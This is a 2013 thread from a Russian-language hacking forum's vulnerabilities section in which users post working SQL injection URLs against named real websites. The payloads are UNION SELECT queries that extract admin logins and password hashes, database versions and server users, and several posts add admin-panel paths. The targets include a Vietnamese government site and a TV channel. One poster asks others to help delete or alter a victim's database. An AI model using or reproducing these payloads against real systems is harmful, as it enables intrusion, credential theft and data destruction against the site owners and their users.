HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15411  
Старый 21.03.2013, 14:34
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Код:
Code:
http://dancukiengiang.gov.vn/news.php?id=157+/**/union/**/+ /**/select/* */+1,2,@@basedir,concat_ws(0x 3a,version(),us er(),database()),5,6, 7,8,9+--+
 
Ответить с цитированием

  #15412  
Старый 26.03.2013, 00:47
kosmo987
Новичок
Регистрация: 28.04.2010
Сообщений: 0
Провел на форуме:
11222

Репутация: 0
По умолчанию

Сайт ФСКН, что-то очкую ковыряться. Доступ к нескольким БД.

вывод в пути картинки после
 
Ответить с цитированием

  #15413  
Старый 27.03.2013, 01:04
Groove
Guest
Сообщений: n/a
Провел на форуме:
59158

Репутация: 2
По умолчанию

http://mcxchakraa.com


http://mcxchakraa.com/buy.php?Id=-2+union+select+1,concat%28admin,0x3a,pass%29,3,4,5 ,6,7,8+from+mcx_admin--

Sql Version: 5.1.68-cll

System User: mcxchakr_mcxcha@localhost

DB User: 'mcxchakr_mcxcha'@'localhost'

Compile OS: unknown-linux-gnu
 
Ответить с цитированием

  #15414  
Старый 27.03.2013, 13:16
BlackIce
Guest
Сообщений: n/a
Провел на форуме:
18665

Репутация: 27
По умолчанию

http://www.profbeauty.com.ua/?catid=-160+union+select+1,table_name,3+from+information_s chema.tables+where+table_schema=database%28%29+lim it+5,1+--+

http://groupegato.com/news.php?id=-2%29+union+select+1,2,3,concat_ws%280x3a,login,pas sword%29,5,6,7,8,9,10,11,12,13,14,15,16+from+site_ _admins+--+

http://www.sweet-crush.com/news.php?id=-2+union+select+1,group_concat%28username,0x3a,pass word%29,3,4,5,6,7,8+from+users+--+

http://www.summermediastudio.com/index.php?b=-1+union+select+1,concat_ws%280x3a,user%28%29,versi on%28%29%29,3+--+
 
Ответить с цитированием

  #15415  
Старый 27.03.2013, 20:44
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

http://www.glebovo.com/moreinfo.html?id=-2+uniOn+selecT+1,2,3,4,5,6,7,8,9,10,version%28%29--

http://www.suncar.kz/info.php?info=11&id=1133+order+by+2

Groove

Флуди меньше, как дитё блать
 
Ответить с цитированием

  #15416  
Старый 28.03.2013, 12:41
Unknown
Guest
Сообщений: n/a
Провел на форуме:
3999

Репутация: 6
По умолчанию

http://yobiz.ru/view_post_bo.php?id=-127%27+union+select+1,2,3,concat%28user%28%29,0x3a ,database%28%29%29,5,6,7,8,9+--+
 
Ответить с цитированием

  #15417  
Старый 28.03.2013, 15:05
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Код:
Code:
http://yhaigujarat.org/d etails.php?id=-23+union+select+1,concat_ws(0 x3a,version(),user(),database()),3,4,5--
 
Ответить с цитированием

  #15418  
Старый 30.03.2013, 18:07
Groove
Guest
Сообщений: n/a
Провел на форуме:
59158

Репутация: 2
По умолчанию

http://www.calidus.ro

http://www.calidus.ro/en/news.php?id=-1+union+select+1,concat(username,0x3a,user_passwor d),3,4+from+users--

Current User: calidus_calidus@68.178.254.206

Sql Version: 5.0.96-community

Compile OS: unknown-linux-gnu

_______________________________________

http://saveraptors.org

http://saveraptors.org/en/news.php?id=-172+union+select+1,2,3,concat(user_name,0x3a,pass_ word),5,6,7,8+from+users--

Current User: saveraptors@localhost

Sql Version: 5.0.96-community

Compile OS: unknown

Админка: http://saveraptors.org/admin/


_______________________________________

http://eyesurgeryeducation.org/

http://eyesurgeryeducation.org/resources-news.php?id=-30+union+select+1,version(),3,4

Current User: meetings_multi@199.167.72.67

Sql Version: 5.5.29-log

Compile OS: Linux

_______________________________________

http://www.moreanartscenter.org/

http://www.moreanartscenter.org/news.php?id=-3102+union+select+1,concat(login_username,0x3a,log in_password),3,4,5,6,7,8,9,10,11,12+from+login--

Current User: morean_user@localhost

Sql Version: 5.0.45

Compile OS: redhat-linux-gnu

_______________________________________

http://www.fairexpo.kz/

http://www.fairexpo.kz/news.php?id=-9+union+select+1,2,table_name,4,5+from+INFORMATION _SCHEMA.TABLES+where+table_schema=0x762D313632385F 666169726578706F--

Current User: v_1628_dbuser@localhost

Sql Version: 5.0.91

Compile OS: redhat-linux-gnu

_______________________________________

http://www.reef-entertainment.com/

http://www.reef-entertainment.com/news.php?id=28+union+select+1,2,concat(name,0x3a,p assword),4,5+from+users--

Current User: craig123@clayton.dreamhost.com

Sql Version: 5.0.95

Compile OS: redhat-linux-gnu

_______________________________________

http://photoholiday.ru/

http://photoholiday.ru/news.php?id=-41699+union+select+1,2,3,4,5,version()

Current User: localhost

Sql Version: 5.0.92

Compile OS: linux-gnu

_______________________________________

http://www.lowcarbonliverpool.com

http://www.lowcarbonliverpool.com/news_detail.php?id=35+union+select+1,concat%28unam e,0x3a,pword%29,3,4,5,6,7+from+USERS--

Current User: mylcluser@192.168.0.7

Sql Version: 5.5.25a-log

Compile OS: Linux

_______________________________________

http://www.alohau.com

http://www.alohau.com/news.php?id=-17+union+select+1,2,3,4,5,6,concat%28email,0x3a,us ername,0x3a,password%29,8,9,10,11,12,13,14+from+al oha_staff+Limit+1,2--

Current User: alohau@68.178.254.206

Sql Version: 5.0.96-log

Compile OS: unknown-linux-gnu

_______________________________________

http://www.ontariofriesianhorse.com

http://www.ontariofriesianhorse.com/PAGES/news_detail.php?id=57+union+select+1,concat(Email, 0x3a,username,0x3a,password),

3,4,5,6,7,8+from+customer+Limit+1,75--

Current User: dbo254601180@74.208.16.163

Sql Version: 5.1.67-log

Compile OS: pc-linux-gnu

Админка: http://www.ontariofriesianhorse.com/admin/


_______________________________________

http://www.florida-cricket.com

http://www.florida-cricket.com/news_detail.php?id=-30+union+select+1,

concat(email,0x3a,uname,0x3a,pass),

3,4,5+from+admin_tb--

Current User: floridac@72.167.232.190

Sql Version: 5.0.96-log

Compile OS: pc-linux-gnu

_______________________________________

http://www.futuresfins.com

http://www.futuresfins.com/fin-detail.php?id=-173+union+select+concat(username,0x3a,password),2, 3,4,5,6,7,8,9,10,11+from+users

Current User: Future_future2@localhost

Sql Version: 5.1.54-0.dotdeb.0

Compile OS: debian-linux-gnu
 
Ответить с цитированием

  #15419  
Старый 31.03.2013, 18:59
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию

Код:
Code:
http://www.gusr.ru/torgy/item.php?id=-26+union+sele ct+1,2,3,4,concat_ws(0x3a,version( ),user(),database()),6,7,8--
 
Ответить с цитированием

  #15420  
Старый 04.04.2013, 13:04
Улыбайся
Guest
Сообщений: n/a
Провел на форуме:
18621

Репутация: 3
По умолчанию

http://www.8tv.ru/?id=12&hotnews=23664

Havij

Host IP: 217.16.26.135

Web Server: Apache/2.2.14 (Ubuntu)

Powered-by: PHP/5.3.2-1ubuntu4.19

Keyword Found:

Injection type is Integer

DB Server: MySQL >=5

Current DB: 8tv

MySQL error based injection method can be used!

Сайт 8 канала, пользователей и паролей не нашел, удалять или изменять бд ещё не умею, кто умеет добавьте новость
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ